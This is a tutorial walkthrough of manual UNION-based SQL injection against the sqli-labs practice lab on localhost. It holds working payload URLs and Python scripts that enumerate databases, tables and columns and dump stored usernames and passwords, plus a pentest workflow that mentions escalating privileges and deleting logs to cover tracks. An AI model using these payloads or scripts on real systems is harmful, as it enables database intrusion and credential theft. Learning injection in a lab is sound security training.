Common Steps for Manual SQL Injection

Preface

When it comes to SQL injection, most readers will already be familiar with the idea: SQL commands are inserted into a web form submission, a domain-name input, or the query string of a page request in order to trick the server into executing malicious SQL, giving the attacker direct interaction with the database. The affected database can be MySQL, MSSQL, Oracle, PostgreSQL, and so on.

Prerequisites
Some familiarity with the MySQL database and with basic SQL statements;
some familiarity with URL encoding: space = '%20', single quote = '%27', double quote = '%22', hash = '%23', and so on.
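For reference, these encodings can be reproduced with a few lines of Python (a minimal sketch using only the standard library; it is not part of the lab itself):

from urllib.parse import quote

# Percent-encode the characters that commonly appear in injection payloads.
for ch in [" ", "'", '"', "#"]:
    print(repr(ch), "->", quote(ch, safe=""))
# prints: ' ' -> %20, "'" -> %27, '"' -> %22, '#' -> %23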
Basic steps
1. Determine the type of injection, whether any keywords are filtered, and whether the filter can be bypassed
2. Determine the number of columns in the injectable table and which of its fields are displayed on the page
3. Retrieve the database version, the current user, the currently connected database, and similar information
4. Retrieve information about all tables in the database
5. Retrieve the column (field) information of a given table
6. Retrieve the data of that table
Environment setup
  • Windows
  • phpStudy
  • sqli-labs
  • Apache + PHP + MySQL
1. First, download the environment from the sqli-labs GitHub repository
git clone https://github.com/Audi-1/sqli-labs.git
2. Extract sqli-labs and place the whole folder in the WWW directory of phpStudy
3. Connect to the database
Edit db-creds.inc in the sql-connections folder under sqli-labs
and change the database credentials in it to your own
4. Open http://localhost/sqli-labs in a browser and click "setup/reset Database for labs" on the page; the following output indicates a successful installation:
SETTING UP THE DATABASE SCHEMA AND POPULATING DATA IN TABLES:

[*]...................Old database 'SECURITY' purged if exists

[*]...................Creating New database 'SECURITY' successfully

[*]...................Creating New Table 'USERS' successfully

[*]...................Creating New Table 'EMAILS' successfully

[*]...................Creating New Table 'UAGENTS' successfully

[*]...................Creating New Table 'REFERERS' successfully

[*]...................Inserted data correctly into table 'USERS'

[*]...................Inserted data correctly into table 'EMAILS'

[*]...................Old database purged if exists

[*]...................Creating New database successfully

[*]...................Creating New Table 'K18ILD27KN' successfully

[*]...................Inserted data correctly into table 'K18ILD27KN'

[*]...................Inserted secret key 'secret_58X0' into table
Less-1 - error-based GET single-quote string injection

To judge whether error-based blind injection or error-echo injection is present, the following probes are commonly used:

single quote, and 1=1 / and 1=2, double quote, backslash, comment characters, and so on

Submitting a single quote produces an error message, which means injection is possible and the single quote is not filtered (the single quote is URL-encoded):

http://127.0.0.1/sqli/Less-1/?id=2%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1

The SQL statement executed at this point is: SELECT * FROM users WHERE id='2'' LIMIT 0,1 (the error is about the unmatched single quote)

To keep the quotes balanced, a comment can be used to comment out the extra single quote.

Two comment styles are commonly used:
1. -- ' (note the space before the final single quote: MySQL's -- comment only works with a space after the two dashes)
2. #
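Returning to the single-quote probe above, here is a minimal Python sketch that performs it automatically (it uses the third-party requests library; the URL and error string are the ones shown in this walkthrough):

import requests

# Append a single quote to the id parameter and look for a MySQL syntax
# error in the response body.
BASE = "http://127.0.0.1/sqli/Less-1/"

resp = requests.get(BASE, params={"id": "2'"})
if "You have an error in your SQL syntax" in resp.text:
    print("single quote is not filtered -> likely injectable")
else:
    print("no SQL error surfaced; try other probes (double quote, and 1=1 / and 1=2, ...)")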
Determining the number of columns in the table (the total field count)

UNION will be used next to extract data, and a UNION only works when both queries return the same number of columns, so the column count has to be probed first to make sure the injected query matches the original query in column count and data types.
'order by 1' sorts the result by the first column; if the numbered column does not exist, an error is raised, which makes it possible to probe how many columns there are.

When 4 is tried, the following error appears, so the table has 3 columns:
  Unknown column '4' in 'order clause'
The SQL statement executed is: SELECT * FROM users WHERE id='2' order by 4 -- '' LIMIT 0,1
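The same probing can be scripted. A minimal Python sketch, assuming the URL and error text shown above:

import requests

BASE = "http://127.0.0.1/sqli/Less-1/"
ERROR = "Unknown column"  # error text seen above

# Increase the ORDER BY index until MySQL complains about an unknown
# column; the last index that did not error is the column count.
columns = 0
for n in range(1, 20):
    resp = requests.get(BASE, params={"id": f"2' order by {n} -- '"})
    if ERROR in resp.text:
        break
    columns = n
print("column count:", columns)  # 3 for Less-1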
Determining which fields are displayed

Display positions are the columns of the result whose values actually appear on the page. Not every column of the query result is rendered, so we need to find out which column(s) the page displays.
'union select 1,2,3 -- ' reveals, through the numbers that are echoed back, which fields are displayed.

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 -- '
As can be seen, the fields in positions 2 and 3 are displayed.
Note: id=-1 is used so that the original query returns no rows, which lets the results of the injected select be displayed instead.
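A small Python sketch of the same idea, injecting distinctive marker values and checking which of them are echoed back (URL as above; the marker values are arbitrary):

import requests

BASE = "http://127.0.0.1/sqli/Less-1/"

# id=-1 makes the original query return no rows, so only the UNION row
# can be rendered; then check which marker values show up on the page.
markers = ("111111", "222222", "333333")
payload = "-1' union select {} -- '".format(",".join(markers))
resp = requests.get(BASE, params={"id": payload})

for pos, marker in enumerate(markers, start=1):
    if marker in resp.text:
        print("column", pos, "is displayed")
# For Less-1 this reports columns 2 and 3.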
Retrieving information about the current database

Only two fields can display information, which is clearly not enough for the queries that follow, so the group_concat() function is used (it concatenates the rows of a query result into a single field).

database(): returns the name of the current database

version(): returns the database version

user(): returns the user of the current database connection

char(): converts a decimal ASCII code into a character, which is convenient for separating the contents of each field (char(32) is a space)

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(database(),version()),3 -- '
  Your Login name:security5.5.53
  Your Password:3
So the current database is named security and the database version is 5.5.53.
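The same request can be issued programmatically. A minimal sketch (the regex is an assumption about how sqli-labs renders its output; adjust it if your page markup differs):

import re
import requests

BASE = "http://127.0.0.1/sqli/Less-1/"

payload = "-1' union select 1,group_concat(database(),version()),3 -- '"
resp = requests.get(BASE, params={"id": payload})

# Pull whatever the page echoes after 'Your Login name:'.
m = re.search(r"Your Login name:\s*(.*?)\s*(?:<|$)", resp.text)
print(m.group(1) if m else "marker not found")  # e.g. security5.5.53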
Enumerating all databases

MySQL has a system database, information_schema, which stores metadata about every database on the server; its tables can be used to complete the injection.

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),schema_name,char(32)),3 from information_schema.schemata -- '

All database names are retrieved: information_schema, security
Retrieving the tables in the security database
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),table_name,char(32)),3 from information_schema.tables where table_schema='security' -- '
  Your Login name: emails , referers , uagents , users 
    Your Password:3
Note: table_schema = 'name of the database'
Retrieving the columns of the users table
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),column_name,char(32)),3 from information_schema.columns where table_name='users' -- '
 Your Login name: user_id , first_name , last_name , user , password , avatar , last_login , failed_login , id , username , password
 Your Password:3
The SQL statement executed is: SELECT * FROM users WHERE id='-1' union select 1,group_concat(char(32),column_name,char(32)),3 from information_schema.columns where table_name='users' -- '' LIMIT 0,1
Note that this query filters only on table_name, so columns from every table named users in any database are listed; adding and table_schema='security' would restrict the output to security.users (id, username, password).
Retrieving the data
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(char(32),username,char(32),password),3 from users -- '
 Your Login name: Dumb Dumb, Angelina I-kill-you, Dummy p@ssword, secure crappy, stupid stupidity, superman genious, batman mob!le, admin admin, admin1 admin1, admin2 admin2, admin3 admin3, dhakkan dumbo, admin4 admin4
 Your Password:3
The SQL statement executed is: SELECT * FROM users WHERE id='-1' union select 1,group_concat(char(32),username,char(32),password),3 from users -- '' LIMIT 0,1
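Putting the enumeration steps together, here is a small Python sketch that wraps the UNION payload from this walkthrough in a helper and replays the databases → tables → columns → data sequence (the page-parsing regex is an assumption about the sqli-labs markup):

import re
import requests

BASE = "http://127.0.0.1/sqli/Less-1/"

def union_extract(expression, from_where=""):
    # Inject `expression` into display column 2 and return whatever the
    # page echoes after 'Your Login name:'.
    payload = "-1' union select 1,{},3 {} -- '".format(expression, from_where)
    resp = requests.get(BASE, params={"id": payload})
    m = re.search(r"Your Login name:\s*(.*?)\s*(?:<|$)", resp.text)
    return m.group(1) if m else None

# 1. all databases
print(union_extract("group_concat(schema_name)", "from information_schema.schemata"))
# 2. tables in the security database
print(union_extract("group_concat(table_name)",
                    "from information_schema.tables where table_schema='security'"))
# 3. columns of security.users
print(union_extract("group_concat(column_name)",
                    "from information_schema.columns where table_name='users' and table_schema='security'"))
# 4. finally, the username:password pairs
print(union_extract("group_concat(username,0x3a,password separator ', ')", "from users"))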
The overall workflow of an SQL injection penetration test is as follows:
1. Gather information: collect information about the target application and database, such as the application URL, the database type, and the application's input points. This can be done manually or with tools such as web application scanners (Burp Suite, OWASP ZAP, etc.) or database/injection scanners (sqlmap, Nessus, etc.).
2. Identify injection points: locate the application's injection points, i.e. the inputs through which malicious SQL can reach the database. Common injection points include web forms, URL parameters, and HTTP headers.
3. Confirm the vulnerability: verify whether an injection point is actually exploitable, either by hand (crafting malicious SQL against the input and observing the response) or with a tool; sqlmap, for example, can detect and exploit most SQL injection flaws automatically.
4. Exploit the vulnerability: once a flaw is confirmed, it can be used to execute malicious SQL, for example to extract sensitive data, modify or delete data, or execute arbitrary code.
5. Escalate privileges: a successful attacker may then try to obtain higher access, for example gaining administrator rights or other users' passwords through further injection.
6. Cover tracks: after the attack, an attacker removes traces of the activity, such as by deleting logs or modifying database records, to avoid detection.
7. Write the test report: finally, document the process, the findings, and the recommended fixes. The report should be clear, accurate, and detailed so that the organization understands the results and the suggested improvements.
